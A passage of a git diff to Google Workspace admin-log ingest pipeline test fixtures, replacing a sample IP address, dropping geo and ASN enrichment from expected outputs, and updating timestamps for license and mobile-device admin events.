- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"USER_LICENSE_ASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
+ "ingested": "2021-12-09T13:38:45.984545800Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"USER_LICENSE_ASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
 "provider": "admin",
 "action": "USER_LICENSE_ASSIGNMENT",
 "id": "1",
@@ -250,7 +196,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -272,35 +218,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:23.574936700Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"CHANGE_LICENSE_AUTO_ASSIGN\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
+ "ingested": "2021-12-09T13:38:45.984551500Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"CHANGE_LICENSE_AUTO_ASSIGN\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
 "provider": "admin",
 "action": "CHANGE_LICENSE_AUTO_ASSIGN",
 "id": "1",
@@ -330,7 +258,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -352,35 +280,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:23.574938600Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"USER_LICENSE_REASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
+ "ingested": "2021-12-09T13:38:45.984555500Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"USER_LICENSE_REASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
 "provider": "admin",
 "action": "USER_LICENSE_REASSIGNMENT",
 "id": "1",
@@ -410,7 +320,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -432,35 +342,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:23.574940600Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"ORG_LICENSE_REVOKE\",\"parameters\":[{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
+ "ingested": "2021-12-09T13:38:45.984560400Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"ORG_LICENSE_REVOKE\",\"parameters\":[{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
 "provider": "admin",
 "action": "ORG_LICENSE_REVOKE",
 "id": "1",
@@ -490,7 +382,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -512,35 +404,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:23.574942600Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"USER_LICENSE_REVOKE\",\"parameters\":[{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
+ "ingested": "2021-12-09T13:38:45.984565500Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"USER_LICENSE_REVOKE\",\"parameters\":[{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
 "provider": "admin",
 "action": "USER_LICENSE_REVOKE",
 "id": "1",
@@ -570,7 +444,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -592,35 +466,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:23.574944500Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"UPDATE_DYNAMIC_LICENSE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
+ "ingested": "2021-12-09T13:38:45.984571100Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"UPDATE_DYNAMIC_LICENSE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
 "provider": "admin",
 "action": "UPDATE_DYNAMIC_LICENSE",
 "id": "1",
diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-mobile.log b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-mobile.log
index 69c376c4453..67fb978c259 100644
--- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-mobile.log
+++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-mobile.log
@@ -1,31 +1,31 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"ACTION_CANCELLED","parameters":[{"name":"ACTION_ID","value":"id"},{"name":"ACTION_TYPE","value":"ACCOUNT_WIPE"},{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"ACTION_REQUESTED","parameters":[{"name":"ACTION_ID","value":"id"},{"name":"ACTION_TYPE","value":"ACCOUNT_WIPE"},{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"ADD_MOBILE_CERTIFICATE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_CERTIFICATE_COMMON_NAME","value":"name"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_DEVICES_BULK_CREATION","parameters":[{"name":"NUMBER_OF_COMPANY_OWNED_DEVICES","intValue":10}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_OWNED_DEVICE_BLOCKED","parameters":[{"name":"COMPANY_DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_DEVICE_DELETION","parameters":[{"name":"COMPANY_DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_OWNED_DEVICE_UNBLOCKED","parameters":[{"name":"COMPANY_DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_OWNED_DEVICE_WIPED","parameters":[{"name":"COMPANY_DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_APPLICATION_PERMISSION_GRANT","parameters":[{"name":"DEVICE_TYPE","value":"type"},{"name":"DISTRIBUTION_ENTITY_NAME","value":"ANY"},{"name":"DISTRIBUTION_ENTITY_TYPE","value":"GROUP"},{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"NEW_PERMISSION_GRANT_STATE","value":"GRANTED"},{"name":"OLD_PERMISSION_GRANT_STATE","value":"DENIED"},{"name":"PERMISSION_GROUP_NAME","value":"LOCATION"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_APPLICATION_PRIORITY_ORDER","parameters":[{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"REMOVE_MOBILE_APPLICATION_FROM_WHITELIST","parameters":[{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"DISTRIBUTION_ENTITY_NAME","value":"ANY"},{"name":"DISTRIBUTION_ENTITY_TYPE","value":"ORG_UNIT"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_APPLICATION_SETTINGS","parameters":[{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"DISTRIBUTION_ENTITY_NAME","value":"ANY"},{"name":"DISTRIBUTION_ENTITY_TYPE","value":"ORG_UNIT"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"SETTING_NAME","value":"setting"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"ADD_MOBILE_APPLICATION_TO_WHITELIST","parameters":[{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"DISTRIBUTION_ENTITY_NAME","value":"ANY"},{"name":"DISTRIBUTION_ENTITY_TYPE","value":"ORG_UNIT"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_APPROVE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_BLOCK","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_DELETE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_WIPE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_ADMIN_RESTRICTIONS_PIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_WIRELESS_NETWORK","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_WIRELESS_NETWORK_NAME","value":"network"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"ADD_MOBILE_WIRELESS_NETWORK","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_WIRELESS_NETWORK_NAME","value":"network"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"REMOVE_MOBILE_WIRELESS_NETWORK","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_WIRELESS_NETWORK_NAME","value":"network"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_WIRELESS_NETWORK_PASSWORD","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_WIRELESS_NETWORK_NAME","value":"network"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"REMOVE_MOBILE_CERTIFICATE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_CERTIFICATE_COMMON_NAME","value":"cert"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"ENROLL_FOR_GOOGLE_DEVICE_MANAGEMENT"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"USE_GOOGLE_MOBILE_MANAGEMENT"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"USE_GOOGLE_MOBILE_MANAGEMENT_FOR_NON_IOS"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"USE_GOOGLE_MOBILE_MANAGEMENT_FOR_IOS"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_ACCOUNT_WIPE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_CANCEL_WIPE_THEN_APPROVE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_CANCEL_WIPE_THEN_BLOCK","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
